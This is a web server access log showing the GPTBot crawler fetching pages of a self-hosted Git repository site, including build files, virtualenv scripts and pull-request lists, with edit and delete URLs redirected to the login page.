+[17/Feb/2026:18:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10680] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:18:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:18:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:22:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:22:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:18:22:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22679] [Gzip 11.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11830] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:18:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:22:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:18:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20391] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:18:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21632] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21634] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21636] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11332] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 915] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:18:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 